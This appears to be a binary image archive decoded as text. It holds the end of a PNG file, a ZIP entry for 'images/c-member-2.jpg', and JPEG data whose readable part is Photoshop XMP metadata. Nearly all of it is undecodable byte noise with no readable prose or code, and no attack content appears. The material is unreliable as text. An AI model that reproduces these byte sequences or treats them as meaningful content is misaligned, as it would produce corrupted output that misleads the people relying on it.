�0�ӃM��ʺ6�$�	�b�R�hr7>,�ܚ��27�x��G�d�Yz�2�7��[���^cVF��1�)��B!�نK�@6�b?���y5�\k� 6R�}aeM�66�����on�
���>�:k�ӣH�0�u�n'�Ng;�ñ�*�k9��f*H��>��'"��_��q�j���!�;�~�a��-9�(���B��l�$�E߄-�9�	�O��rU�NZ"�&�̬��$SL��y�p�����d��l��'��w�9f
�� ��Q��ޥ�8��H�x6�D.���\X��L�t~C���y��u'�7ޠY~fd��0�N��@�C�����kO��u�Xo���8bG��?�8��n�]m�G����<�
��~/�7�Yf���7��9��mi�=0�ז.���S��n+�A#6�P�\۾"bN�ОB�}VhM;�@�S�蕹��FNŶ�i�E���$�,�TwA���q�+'�W���Ԓ��p�F���4 &�ӎ����ڡ�{���Tj,�_��0@܃fT*%l��K��#f>O ��?ׂ��c�@�ەt��ű��l��M}
4�?�ψ���U�;���t�74�m~p��=G��Q4{
z�e �,Dډ�o�GO���1N������P�2�U�'p�-!Or�@�l2�mc[0;��ߧ�-XI�qMEuv�اf;6����2=9�^�K ���?����WG�����J�Y`�5,����e��N��z���/k�%׊zOqM��d$��B�g��[h`�\��]��=��f�������W�ٵ��Nh��l�(�=1��=�y��
���H�C��X�l>�h���
UJEM�f
��~�땢\Y��˫���{�C�#�NSE�P&�9�&�d��vT�6a�*0!G������4t���kݩ��!V�ÝV�L���	'j����ϼ�]^���v��
��&��}��Ŧ'{G�r���;����C���gO�Fl�G$�^�xLsrG���gn��\Nn��Ny��e�ʜ�
�]g�[��tGs*�ھ�X�g�	~��i
�tڪ@7֕$�i�ִmM}� ����{��]��u��uH@�8Q���Pf2_�����,.b2�ʥ�d;�i���[n:.s /\^0�����"�0E��&=����@���+��a!�D6���h�����F�I�z�@��˞��=��V�k��7:<����IL._�*ȡ]S2����ѥs/�ľ���N���a
j�aF��apD���q��{o�]Vp���^��꼮ǎ��VC��
�|?�jI��&=�S�6�d�M
r\�\��
����i?��~	B@A�?uI��Ju�H歲YrO����l��+�G�f�"�M�^v{��'dqcK;��tV�ol4Y7o��|/a����
�KX��ێ�G��Ms�똄7�1��ʱd
����ѥ�
-�����7Ͱ�&8�%�e���{��#{��N��ZN&�r��4/�G�ä�n?�f��QO\g6����a�;o�S�7���y�}Y�C������½<�;yj�6�l��_l������C9����;x��-���2��b&UD;Ck[V�i%4�����,G�xͺ\Y^Q:��Z��Jڠ)��{��������	�cys�tFA���W}�L�K0{(b�L�n4�c+ ~��tT0��Ms|�>�59�m^��
��>
�r٘�9#���q�����ڷ��M� 7����:|B}�
;����EÞ�P�o��lb��S�<v��,\��#��Y����V*O��tmk;�~|cůkg��t
-�CbY{�R{������Om&��b(n.��ɷ�Y�ꀎI����E�-:���n8��W:1���c�,�V���(��`ּ�&�̖t�LI�6��T���M��+�u ovK�8mxu
|��O`�e��Ţ�Y;���Hy�̬dqȽ�:�[n�=.�>�����E�̗�[������kбɭJ��;�@[Z��r�6 ]�ّ�ܵOkb�$Rډtt��߿/��m'�dd�]Ԇ =�8��*�b#Ѝm�eE��p]OnR49�6Tc��q�O�Z�	�"��hˈ�h�S���G��Q F�Fַ�essC��޻W�6���i����Rrdr�f;���v������_:.\�j�6�G��bmiu�u0��~+0��V,������oucC�7"2�;1>��h&�yo9�W�u��u����C���T�$+r�������}����k�&hJ�uh�Ɏ�v̔ٽ��D����sŢ�ܚ��v)�3�zBoD�Zѭ�)��&R��m��x������c'�#��}�݌�9��paK��#�[�jz.���砞~�ʲTa�8:��՚��I��>�D����|�R׺O�S�:<�����N��!�u3��_u�1�[�f���`�>�t:��v1���dtdH�s4��`*��I1W-����q\��;�-h�r a��E�,l�\[��}�u$�qw���pmձ\�;wǨ����
�kP�Nc��E�ao&V�Wa��4je�A2�q�D��Q�Z e�М�0um#^�+W��,uS�1�|�㧱��;,�i1d�EM��*�h���džޢ2.fi}SE���p�t�̓�=I֓�z��:M�+ ���v^�@,���
��b�t���T0�]�4�lry�;[�f��h
Z��[E�Vem�Ct�Fa��{n>*Gg�5��׼�k��f�2�b���#�W�,@�5��-~GD�p�
|��G�>C��8
�c ��F�Tp��jI��h�(�:��/���Ln�h"�J;��TQ55=�>��!��~�o����#͚4��4��a�������O�Ơ&w-4���p����g���m��*����5Ž;N�W���YpL�@Gu��q�ڛ�y^3�)9x�m���]�2�����{opۧͺھ����jCrl�R�P��̑��$j��1�X�SO��B�M4���{�=<��t$�kᚙ�@�?�b+�dJ�O�Z��3~L�iK�T�8YU��k���j��IB�CB��[��d>���d{��YLIi�:�)�p$2[�q�SlY��8�ݱ���8�!f�G�a��DT_ۨ4dq�s����,��o���G�J���d�u�yԔ2�x��'ZZ/+:'1h���7���p@�[
�\�Z��u ��Y��@���4s����ۡ���C'�1��=���S ���&ȊF�Ƅ��'�V�����. �@*-Q�&�
yT�,̩N(
���,�������*�S&�N�f��/a�����o�A�%T��t���`��i53�Ͳ!je�8�00��kY��k�0�~PVK�e�X#�;�۶�MI���wL=d3j��/\��T��9�nM
m�
����N�:V�tx`S	P��v��#�c_/B���W��9�:�}k�k��hKO�3�?q��%�9|�8o��֋�i��ၞ������6�����|N�˒/��)�Z	�$�}����!�^�4U�I�6s-#?yר�+��=�\:�	y��R3��QΑ&�*ǃ�L9�ok�ހ�(70G�u\;D�T���ivxP^Y��z�p>�w3�x���q����`�h,�$i϶�k8ME���R�.���{��Ⱦ�!���+�=��Ɋ����5��귘��Z)�kڦ֢6��ݎ7�1L�6Z6�HF�t{j �y.|#�r�k�1�j���j�lvE���b������%�M��Á{Om��4Ӏ��J*�
\cZ%mpx�^<��b������t�	�+�Mk�u�Q�������&�Y�"8�t���X�.�F�]3��3!�Ō�=ߠNf���f�f*�-K��_e�u�1�f
ݔ7��ԉ�I�qfTv�dt�-��k�P�Ԃ�l���h��Mۛ�t�c	�14����Rm^�����WG��~��ƣ�`?��
��I$����%m�^Qs���nM�.�2�eSS��s�����L*1�Wi;i�~�;�q�	1̄��
4��ZP�����0kv�k�v1��e+W���u񃶩���e���4���1����Y���A ��TL��Zɝ�X��N�0N
�ε�)����Q-��hV��=�m�	zȉ�8uP� �Q�F���a�=InӍ���*��`);:aK#�0y qC��Zо���
V�W>���
&eݵق;����7Ś�N@�xQ��.I[��Դ[�*�kFqJBP|yZ#RS�ſ����^�l����q(挾>ѕ�k�q��я0k�E���TN��u͝raa��(�#�a<�x��ᶞ5�L��"C�Ţ�q�oLܢ�gv�Z��V�&[˗����+7�l�lZ����䈜�U"�Nϗ��zux
v8�m�Ȱ�*@�P
pcп�C|�:c}�b�i�9�����D�1>��~�R��Z��tfЏع9�h4�3���`:��T�v�37O]7r��=Ǥ�ƴ���Mg��8�RۭU��l"���m͙��T�,�接>�d��_�����7���*Fpd���ҳsh�>��w�]��c���^�E�r?z�`B���e��gK"Mg���E�D����!�U����!3��cY3�,iFb���o A݅A�?6��C�gW�b�+[��@\�:�J)���2��@�ZB��f��bK2� �?�7��^M*�vbОUM-.�Pg�C�΀��E�ꑢ��R�Zm�1��m)|)�u1�L<:`<��m�f���L&k�ܤ�?g��^�W�•�>��}��&��ώ��P��}��C.\Y�G��)h�����2	�����ӡh��܈)eT�c��r��UMFS[7Q���hܕ�A��p�#�}��0���$j�l5�4��5���yM�eR��n���Cћ��i�<kD��
(��sX'������)��'��9:����u���&nj2��74�[[��-��^���i%��y��Oˀ
[iz��B�9�pm��uU�2g�����ϱb<�� �+��M�_Y�^#��c�������213�:6�
/�6�������&d̓H�`ŵ�c	`ةe�T�LEN���\�Nڢ�X
ՅÃim��
�ߣh�TjFwڡ��mu������*���XD3��|1]R,�!Q�t]�N*Z|���o��w�s��i�E��X�(6�A5q\`�G|��Z�71�P�w}�^�8ڦ��~t��g�VQU�$���	�mIy�gt�1��)��Fl��Iؔ'���_0�7`�iK$
�I�v�]ҬTU%�A���#BK��Y�[]��	q��Cڄ�nj[_�@��0�$y�|�V��v�f������V
��M�GE���?C�Y��,ljŬϙ���q��#�o��+y�zX��4�ڣS��s<a�>��mݩ͚x�x�k\��T� P������ׂY`*�]�ŵ�u+��3ٳ̀sD��]���dc֋��WxKc�����m��G1���e}�^][Z����b�����\�=�I���N�{`�N�
�IZ�f=N�f1&"MXP�
Vi�-��h�X}
��$�'�Ȟ&hkX�ZWuB�ְ��"v��v��:`�ѱO<Aɰ��sx.g%f`pM�١�$��I'k!�EىF����uPT�/M���^�&�u�e�J3̗g��o��B��oN�$��	��3%<��P1=i	f��!�D�gb��dl���(6x1�p�[&;�œ07~a���4�w��y�[�Q�I�,H��TJm��w2�;�N��ڦ��6��Ӕ����D��B�d�d�pZL���4X���P�p����0���KyM6�;1��(�I*���S�kS�A����}$��e���!&�������Z�j��@gz� q���FiY�Du��tD�T�'ֶu�˱N��4����@����+i�����WS��t��D�IԤMP���L\��֕+!�J��Q"�[עA�F�A��v����z�jx�<�w�}������U�{w8���@2��G/x=��S[�g��
pk���f&ȑ��.f��$G�V��B����E��҅ϹGG��Kz�H�k�H�3�C�K���ܪ��55Ӊ�G��q��Z�IN\J'�wE������F��TN_L|��vmR��wsg��k��}�ɤ��S��#���X��î=C��E_ݿ7}xss�����*A��Q@�&�(Cn����S��
f�4y�P�����ʘMbw��P^���[�$�{���}�kr��g��n���g�NӒ�a8M�r)����gTn��̌�n��2�Zcy��R�&�i���ޫ�^��7���W���vid<A.3��� 1Q��Eh��YYX0��	�̽%��� ��.A���T�E'<O�f� �„ޚ�w{v@�m�7(p���_��ȡ#��:�Y��on*�&X�ڀ!��Q���/��rT=����fN�#����o՛V�"
c�^:FS�6�L�F�l4�l�E�{�Y��
tQjj�	��0��Q�͗��Z&5<�i	c���w�%�&��ҧgN�=x���+���b(��{:"E� &
��B�cHM4����U@8b��i2���
v02=2 @ٷ��PA$���B5X'�#�M�C��g���‘�)�����C��A����B��v��z���kC��`-4��@`�R�X�p��G.��kB��03H�6(<bC�*�n1������]:�2��40��hN@��L�����&'�€���r¨e������D�4���+���#�3ϟ�:i5/ˢyL~�Cy��	��E�!^q�����X5���fNB�"Q�Q�3[]#��n��Tw|�����G�$!�=���q�xJF|�T�<.Vj����y~���.r���TXK�f+�Y��X�d�~N�9y[�Yu���ϸ�V[���-��T��+���>7��A:5�r��"n��E�����q�ϰj'&&\}e�6bh߰�@�]�p�>x�����|"�y\��C��ޓ���\+ҩ�F[k䓝�2�xp�b�q/�Htյ�����8s�$�5M���[�,�u�tr���6Z�d�����X��J��
�Hg<�4�[g���I�\T)jlo�qE��e��F'' ��m�#KBD��C�D�.B��.<?�8�\wg���gT�ҜM(Ҍd�87?��4�H%4������Z�b��݃\r���v=�<1�^�����<0�
�K�q��`G������x�϶��1y���A#�u-�*wy������(8�;f��݄0��zX��������S��������/�8��3&ﭪ�Upsv訰=’���
�4bB��b%�M/5�,��9��,�`�m�y
%:������E��'���#��|fV��à��>��L3��4k��R�D5ˮ^[p�r�p���T��YY�@,�kd�F+�C�(�w��y��Y������E�%ܩ�&qs�_���SUB:O��ay�1qò�ntӁ�8�35ê8V�X��t[]�-}�(�� �nzumc��u��?�����1�*����}�.�����,c޽;���l�w�C� VdR��&�Q��ID�uP��k������"�1��P���E��s��DZ�Rew�IEND�B`�PK�8FZz��w�w�images/c-member-2.jpgnu�[������ExifII*��Ducky6���http://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c142 79.160924, 2017/07/13-01:06:39        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:01801174072068118DBB8F711C24FFAB" xmpMM:DocumentID="xmp.did:4E2DBB4AE6B911EA958CECC45401AA1E" xmpMM:InstanceID="xmp.iid:4E2DBB49E6B911EA958CECC45401AA1E" xmp:CreatorTool="Adobe Photoshop CC 2018 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:56c64f11-1d9f-cc41-81de-de9ce0142090" stRef:documentID="adobe:docid:photoshop:f6ddc90c-cc75-c645-bf82-ef9f41574fef"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>��Adobed����		  ##########
#################################################�����!1AQ"aq2���B��R#�br�3�C$��c�S�s4D5&ғ%!1AQ2aq�"�B�#��?�E�@ �@ �@ �@ t�3��;*�'_@2%���(�������u�� ІL7��p�4�1�G{�4�!��J�y�DP.�̠p�A������8^\���"� ��f�~e#w��#��0�y㧼(%l�w���@ �@ �@ �@ �@ �@ �@ �@ G=�q
�+���j�ٗ�*ᅯ�@oĪe���'��\@ 
�@ ���F�32y���A3/�&�w`����]��{T
�Q� T�@ �@ �@ �@ �@ �@ H��i/�f
:�f^�L��}3�4`��ީ�r�8�ē̢��@ T�@ T k��V�b���G�qEZ���]'�PL�@ �@ �@ �@ �@ �@ ��`��;PT�q�_�?�Tʔ�K!��Ogr!��@��@ _ڂˠuY��рE;͍��eh��=�DD������u���+*}���\U�n�Ld�m���A��Hc����z(@ �P>9���9�[�����I�2QVC��A��*�@ �@ �@ �@ �@ =�cu8�9�f�xB?���Tʓ�{Χ�����P@ 
�*��4��R8Ý®��T$��:�0�.��;֑�S��a���s���Ћ�Β4�D�ir�q�j���S�*7��CR��Hc�#\�8x�c�h��jt��7�\��_0��am
��Y'�K?����E�m�������358�XE_����Z�OO]Dh�ݛ��Df:���`��V7pY�b���Ec�͞r$9��ͱ�\�6$߯`����{>\��k8��<Qo�����υ�-���Zܵ�7Aq�<�R��`V��_�,i�v$pa��帊�͎8w-�'�"���@ @�H��Zh��W�8H4��2EZPj��@ �@ �@ �@ �AR{�2����L���IW����@ �@ TT�]G~c��>���^�Ւ��ks3�'�1����:�W>��k��&:7��7k��h�{+�����w��Z�p�pu'�O«;vZֽR0g�\�7Qa0�X�:������~�����7��m�:C�k����!_J��b=�l���e�O���(��J@�觭�.Q]^�hI�l/�bˆ�=�� u�
=�9S[�9�7I@
�.�Ys�F'�5��r�w����onm/i�NNӅ{—U���л򟪮��p��C�E�5���d�թ�I�����\�)�в޷(��cvۛPN��U7Dr�j��h���t_��5y7���
��U�fLO�S�v׿��G��Z���yD"F���<;
՚�����W�cN�k�DR9�&�	Źrʼn�%B�@ >9���8�/Cv�0=.�rQS��@ �@ �@ �@ �q-��<3(3'��l<,�#�U���
�@  TP5��A�o���ƶ�`Iv~i*��J����M2����wrHEČ�C�xk�&�����dd�z��I� V�H�:W:qXnF|ۛ�����*Z����s\)N�y)��a�V�(�s��{X��Ҕ�[^ʨ�W}���>�Wt5�7��,��^e�������q4Ϲk)�D���K�Z�a��֕����f�*YO���c�C��й�"3�#q�;Ժ��n�|QGq�`h�Jkk��{*}Z=֐M0��/�������:�	�%K�y���$C�lp#NgIƞ�hR겵 q��cۤ�����������L&�Si}Oʐ�������C
87�9��⚼�0<�ϱ�0.H��>��٨:�u^MC�9��,i��O�!��:�S�ܢ{�l��/������+�u�n�v(e��G.0�t�٨.A�b�k�϶��
�ȋ�sd
$;EZ�����xixv��l�Y�����y
��@ T�Ab�ǃ�������V����@ �@ �@ �@ R��k*Ⱥ���&Y�{�����*��@ 
��Tw�m��W/����I���d�ɽE��s,δ٣�It(�Fmk�F�z�w���O��z�s�W5�k|�{i�C]-q.'������KK�ٯX5:�@oc^MuS<0R�ԉ!�̈́�.�$
�l�lu2�^h+�5;���]淩ϞfԊ�|�H*.	7�^�nب
Xۇ��r
'��T��,S��K&��H}�^��?W�Oɱ��<��r����>��p����V�1�P<U�+�R�6X�)�i$w�fG�k��si�Iv��Q˱ق�ѹ�R�Ek�K��T���w�5������	 .�����b�Ҙ9͸-��[��1t��U����8j�L�,:�l˖SېڑLk�!߻�g˜��ɮ-SF���jz�r܉�\��Ζ�;L����
֟z�f����'>u��dS�W]?� ��U(�
k��ܴIhG�nEA�sm*�2�	�d28��]��a^
�T�V����L��'�BZ��0�+hX�299o]�継���ty����Wl?�$�����c`�b�w��:���QO.�P8�j��Q?'.�sZ�VL�l����G4�P�@���{��M4(/�t�:]���QS��@ �@ �@ 9�cK�hљ(2-YL|��S*��@��@ T�A��n��sO��D*L��+����kq=�[��\ׇ�����#uɹɬ�PZ�k]L�1�����Z�k�Ր��[�8_\81��ض6�q��������Kd6��J�g��S������X<*[kRHʽ��?-�8�GT8�F�&��*{���pc�����0`?x�U�k�U-7���
��وZ�Q�y�P�38�\����9�Tr����ZG��"����I�b��k�c������;�s�qI����=R[\:hp'�qi<�4#ق��r�k��P�~h��|�cH5�@��R�	�nXz�0��/߄���:�#�s�n�wOk�[\-�g��&<29�'ʒ���c�r�-�Ӻ�F!xe�`�	+�<�<Mw�)2_啹�b*�v�.-�9�c�ˣ�ۇr�����[�ć3�GaG1�ML�j̦p��f�D�}�p�bNNi\�tn�������,$8<SSI;���sR3M
|�N��P�I�K�/�uk�C�)��yo��1�F~v���Ar�r�n���'V	Cr��ʫZ��r��{L;[+ȧ�U�D��5�4-⎟��>���l�y6�W�I�"p�F
���x��EjV,_�fM%et�T��=�i@��@ ��l�������*1
�@ �@ �@ �@ɦ�jy��8���7RN�p`�VP���@ pA����~�f당�C�D]GH�C��gm�o].ׇ�o[�3��&kn�C`d-�1{��ٯ6�Z�뤌8�1��$=�kC�k��2����|F8D�كK�.�\��2TY��IeO�5�#�x��V{����pciZ��4W���ʄ��:jԉj��7��#GrW����k��\�:�L9��k����|���`���f�L,������)�{Ĭ�ۓ�i�p�{��jvE�]����:�ı�A>�=�]kSiZNvϸ8�O-3Fr�G��6��Y�*x}+�;�I��6���<͞�T�0�u�Ko!��s�:Kkͽxn*�%��s��Ý��ў��&�Ժ���j��k�ּK	��$ǫ1�s����l�[����"������uBO�xk�I��=g��vN�Q@����:qk�|C���$u{.�E�`��M�ZM�p����v�V5[p��6��
Lv
$~&�jV3U�`�֏1�Xx�j�*7Qh��.C��phy�y?�<Ѧ��s#�I�qnVOt5�_�>�k����wѹ�/���"p�> ���Ӧ�y�յ
�"y��"y'_��?j�&�b� �A<.����#�r+A�k��PT
�@ �@ �@ �+���f�bO��Ji��g�y���@ @U����
�2PT���m�-t���F��~p�KZ���������*�� .k[�@v~���l׳Mqn�+��m�Y\�.��(�*�uC��M:b4!�ĕ�2^3�q)l�yuB�jp�N`�ص�r�4��}�1�
r�m�vb�ȥ1������H�j�f��	A��iU}���j��|�:ҍ��Oe�>++$
`t���U��ٜ��tF�$K��v\j�[=�7���2��)�V]����n������k�>�^Ҟ�yOIH���FecMKI�ǢH��<(��})mm�p�.1]�Ӯ��3���n�{��d��/h:�#	88��f�gMi�Cyi�宻��KFF�`"��@9r\��j����/l�k'vL�e,4tNukۑy�6�c�������>c(Z�
C��Pp�QX46S=�:�W��X�t�k;k�������{m�s��
*�t���qi��+�s�3�k���-�09���i�hqV�vv����8
=AƸ���W�TXJv��}D]R����0:����͇%�b����}���kpY����^)���E��u���x�8���y��ʀ�����6��`�?b{I3��{A�-k�{k˪��lҳ[j�"��2�#�\�Z�m��$�[IO��Zg� �j�+�ڠ@��@ ���16�юF��M8}�)��@ �@ �@ ���2�y�ŖW���U��@��@ *�`"��5�S�+�A��5�'�	8]��qq�!N<�ͳ��է�����YD-s|q�C+��q=�%���L�\�<m~�����h�:��H��w�J��s�V����Id�k]M3Z�?	T�u��k�r�Hs��1�q+X���cE�\�hL�m}���_m}T�����Yj��o
�������o`W&mEq
���=�k��b���P:�
�W,�Q��E���\�uGA5wDc7�tUe#≸��$�1�v�\��w�#v�]Ht�	qS�\�OXM�Z�|��!oz��.Y��9y�	��Ь]1��]����e�[ktZ��u��	����S�ßz�xu���Q��h�㦇;�ո8�)$�:$�{��,�{f��C�47p��1�>m?c3�5b�ܭ��ߘ�r���U��j���=�.���YdV3�Ñ�m�or븨��%|�)��F�D�o�Z8.�����v�RH�fa�ZF����g�r�:yj�w����~���0f$h�C˛}�9]V6y��u:�����^�*��c^��E�VF��\ڟgJ���7 al����1�C�+����+k�e��7�h-�"�S��A��\Z�t��K�̶� װ+
���etm����}xb�ip�o-�1�A;<E�3�N�{W��y�B[#C�j(��q�@��@ �)]��h�F9#u7�9(���@ �@ nnz��>�(1e���C��@ \'�3՞��f���@ی���� ��v|Gn���^Q�E}|�:+�D��_p��QwW2Nt\e�ӆ=��ah��>g��0 F\*pMA58rZ��1"��q8.y%�@����ȁ:O2�+�Y%{��€5`8d=�r3j��3�[�4�ug�[��Q��Q_����)Z����B@��ݵ�Z����E�*s�:�&���P�f�˵&��R[JI����m�e��c������4���wE	-�k��Tv�nW+��l�.e(�[���3���&R�l��/��5<P����-e�������ـ{{�7����g���K�&�B5K���&�TU����u���A��Kx�1���t�|؏�O3�/׋�o��wI��G��a
.����L� ���Y�ĸim�O���PiU������m�6+�&�ۦJ��iA$X��rp�
�i����u��5tz�t���98q��ܮ��f����6���E�%��q�Y�
x&CA�
�9,�����:�FN/����z�X���p��Kk�f���C��4�$���3�K�$:c�8�����=��+S	�;u��p�
d��
`Lf���g}�>)d `�ux��{*W]m㤙��A����EF��i�on}3~Z���p�ڬJ�Z��5�*@ �H�tN�=��
(�l�nEE9�@ �@ �A�2�ߐ�s<�bO;搽�r
�$�@U�@ *�@ *�@b���G�P�r���Ip�H$ᡧ��\{7���ze�s2�#4�����i�Uq\��wi�o���� 	��Pw,Z@v+Ra�L�!�A��|�ih��Z�ż3�C�e�����$���j܌��&qΫF>iǹ\&N�g�0�F��j��f[�{[�Iq�S��y��z��nY���(N@�.Wg\F��ckZ
�`���I)8Zj�����g�*4Q�8`]�{��#�;���\_�d`I�V��ǣ*���̨a�(8x�2]'kuEQ�� �gR8�dnx
 փܺN�+�ʽ��<�/C�"Ʈn�{�[�9m�2��C��ކՔ�?��z����^�q�s�i��ӏ��o
��wd�EԬ���[���\4��>�Acf�ۣ�����qgd���$ �x�pSJm��.�a�-��<Ik��{�F���X�R�:	��m*�M+;5Ƿ�����DR+���j���[�;L���З1����{�*�ݎ��`]��@9i��\�иDZEq�|V���ᳺf�M|��j�Z�R[��s%�ش#��jj;��JX��>F����:k���*4Z����2�V���FH��k�ZO�oG����|���51��M��q�z'���hm�5����df�
��Z���--�5���
�@ ���Q�Na�\�49��䢕�@ �@ =�cK�hщ(0��q&��0c{D@U�@ �.�as�v���������n���FPB4��h�F�`^��=�Ͻz:�޷��d� ��\	4>&4�
,��寬��>{�5�Iu�ά���p��Nk{�gC\)�d��*Ĭ�o�i'K������;r��4i@(H�Ĭ�޺�}�i�:�ܳ-�<p+�ٻ�գ���-p�i���]�L�ZSiئQ5I
s��x)vY��Q�U��g+��lx���";0��
��m�҅��Ub"���u��G[p��{��V��Y˖߶��Md�xT0rgh�p]uً���ۀuzE��?�w�9]�J�4I�@{N�S�0S)�Ӑ<n��̠t����&Ɇ�7n�
�K_%��Z�j�א���Ǿ��լ-���|Mv-�<r�Z�6�ڟhy��`jt{(ꅛVF������R�@c̯"��s|�������m��)����&k#k���
'�f֝K�<jlt,f����R��ش�-�V��\j>g
����v���G�c�8�e���B�7��y��\F�8t�8�%ۯ_$���霜\p�Ȋ�d�3/v����CkW4s����e�``�%"�$�pk�O
�ڻk�}�t�U�3�(�RZ�9��Lmvˆ�
Ɔ�]��e�h[sO�ë����ױ�T�@ *	����C�9�v��s�(�@ �@ 1��5�[�3̪)"��@  3���-�&(L�S��L5p���
kS�Zn�/��1Қ80�I��ဠ�2^k��\|9���7��X�QFYjΐ�[��Θ����o.R��җ��1�R�荴�Ktp����9dn���OS�Zv�}���Y��	�(�i=�*��6�Id��"czH&���\���GKmj�J
�
+���ڽr�Yk?/�{)��@�)L��޳kR,G\��,��uuxq��TJ�f*��z�f�튦�����jcEg��!�ٵ� ��
�2ʸ�5�8j{�������1��x��b`�W�`^��sd����x�%h�����3����4`
߳%�����A,��|,<̍ӫۊ�L5����bi:�ۆ�M*�1�_����Y�7#��t�2�G���GU�ǓQ%Yf�ct�(#
�F5����̛S��:�j�;�劖,��Ym
�(�59��<e����0]�����-Oʚyvb�&xk���x�/nek���pΉ�&:-@������l�J<@$�LR��Nx,V�p[�70�D[�Ln�q�p:Z0�f�*�gc&Y��4BH��$�>얣��G���5��������7/j�G�f���sK�{��޺J�bė0��ur���78�P�>�D��@ 
�\���7�?r*�@ �@ 
�ߖ�%���#���P�� �
�*��
�1G#�V�hh��+�=Ew3�=��(I�+@��fJ�m���p�7�nO�8�S��{�Ĝ@<IIb�&�4��.Mv����+�-L���,��͊:���R?q�D֐��)�Nk�=��ś[�:+${�Cc05 i��W�X��m�`�A�;9�U�U��|'�9���Z/h$�4��YY6Z4�E�=�65�kAi#�D���Br�U��)Lp��;3�9���9�ܬJk���U2�q`NJԂ(�\I=�,��X�HtQ� i�:F]�֢Z� c�j+R�$a����9�1��qĜs�b���H,Zb���q=�5��9[m�X�
��h?��L&R}**H�x��L1К���]��Y���(\GTf�*�dQ��j0A�ڪ䂭�-��@9����6�-��M-��-��1NJ̮�ȧ������HȻ�
Qn9X�7}�o�p�F�7,Eh�ϒ�y�#�����i���(	sΖ=��8���WC4�9�Uƽ����m5�B�A�@��@ 
�F�o1�>6��ڢ�@ �@ \��"/9��̠�{�����5%T5�@��@�@ *�*���
�*���t� .�j���ˎX�Y��dy/��v��t�|�.q�CZ~bO�ؼ�����Y�2I���ٍ#�T�����-ŨvA����Q�Ɔ��|�a���������R�mm��YEk���\����Ia�4

9��5٪ȴ�@�)�h�Z֭Z��R�	8���Vki�zf�-�*U�V�Br�(�N�֐XA�x�ו�M4�8�Y�m��2�YY�`�@��\����R�@�TMxR��d�[1���6���]0�P� 2�L~
��-@�Y�S�J���"k�y���]���P�h�S�J��S�b�A�E��+�N��0)�.T5⢜ҫ��=���J�1���ωoƺ�\d1:�i|̯�3F��сi-ʛL ��+9X���4�i�y�w��-��vM�\�
��yr�j��Ѐ��W�+��|<��We1{(���+�t�]��ZT
�*�@ ����1�
6=�hsr*)��@ �ϟ1�����ڪ+ "�@ D *�*���
�*�A^�g7|��R�y�j<��]@<���f9���^�k�ݮ+$��C��˫C�k�M�F��9�#L��Kcxvr4`\5WS[�[W
&ۘ\CmA5�H�{�rX��BǼ��c^�h�I��+���ƴ�AW�9��k���O;T�*�n-���1�,6��kc��[��9և.���K�p��j#Rr�U�i�8���)��P*q�%��N�;Ue,f����;-�(0�y��s��excL��ᜤ�.4�/~kR3jB0�޴�@q�1L��xԢ�ފG6�e�͋*''ڳcr��gj�5��1��0����`rZ�f�A��2���l�Ek��tּ�g���#�u73�1�����y����w1�yo�t�<Ȝ?1����{�H�����Y�	��21�񵄍��sÎ�]��x��k�pt��nNp�I٨/F�e��b��2T�P�@�,ZM����vU��@ �AGs����zߟc�:�D�"(@�@UU�*�@�@UTP@ɞ����Zы�(�OWo)�aai�Mn�K��N$O����p�'���s��60��d4���p��mv�h��\8M+��*Ѡe���R֣\Bִ��,�oGi9��V-j ���ѩ�91�H�\뾩��憀Z��j���Iq4�jiƫ4�,mhq-�+-�A��bG���@jfj�V���
��*�Uv94ң�r3����pp��pY���F&�k,Xx54&�qTZ��M0���ը��0�;9.�ʥ�8���S��m�_L��d,~���)�p�T:��:r(B���%��㳦��|T�p{h��f��-D��c���Xݭ^w�(�A�u_�WSrˍV#�¼�2+.5H�l�ᩬ����Xr]#�X����VW�C*?��5�N��J㳹ڠ6�bR4E5N�#����LW
�t��ր�@¼B��~�@��@ *
i|���7�TT��@ #��5��=<��WH��r�8Q @ DCU *�%P%P@�@UTPA��؋��a��gS�J����&�ut+O��]2��*>9���^�|*�֥�c@2S��]�{�ꑣ�����i�m�6�%�9�h%ٸ��*q��5��IX֍@�7��0�x��Y���u .��@q� r�b�L%kC����iXl��8iªV�]�Fӕ2vu�+
�f,���sS"�Ri��0�k8P䢦k�5��E����1PX�L��rࡅ�H8�[��e��A�V�f'R��yr]5�m��AtsL1mV�D]SN��r�5��6�Q�8|	S�)��f֤E&#�\�oRS*(pǎt[dq�4⬨����%��Z�=�&�����Il��M"������2M�-���+�	Y�yRv��q��P�}т��.��r�1��\%�X��Q	l��1���/T�<���mt��«�R��P�@ �	|��d��y⢄�@ 37k��i��T��AT�@�R *�*�������
�J�
�*��
{�˭�ۙX+#X�.��8�
�^_/"�muĮ��>^�G���9�>,�y�;Օ˙��c��x�|�v��R����X�.��������p�jx,�";��ERFJ�>]\iأr+:���V����Z�~��"x�88�V���=���76���*�*V���J�j%����eœ�ZO�H(%Ɣ<>ڠ��k܂Hɠ���.BEF4�(V�Y�*WM\�V��i���Y��M
q�(�J�b�p��-�*f�
pZ��
��xJ+����Vj��k�2`�I�k���cZ�pY���j�h�=��i�ⶄ��AZZ�䱳z�w+vM���EM4��uOjk3�ێX�����n��i��˓���۔1�y�ۢ��TOsML�]��+�s^�釙v��j�GS���g_��-�-��P�@�/Y˩�m˹EY@ d����&���:I#�N5*�b H�(�%P@�@�����
�*���b�	:u�x���7ߚ�����).A򃆚��:|�r4�;3\+�"�����=��5|�8�%Jܥ���ֆ����8WH���,��t�:Q��/'�x}�7�s�t8�h	���6Q��i>��=��|�6����QVamA��)�J/0��JW�F8�*a���L����ƃ��F���
v`�f:L:q�U9�"1Pi[b�Ehச���
@�h4�n��,9���ܲ��$�lL׼p�b��o,�?�4�B׳89�"%�R���\�� ��S+�� �U2`��pY�Bk��
�W�
め�~4��f�ê��o,�@AV;F&������4���r� Uן�/�&�~�s���hi�Zf��n���i���X-�����<�/I3N�
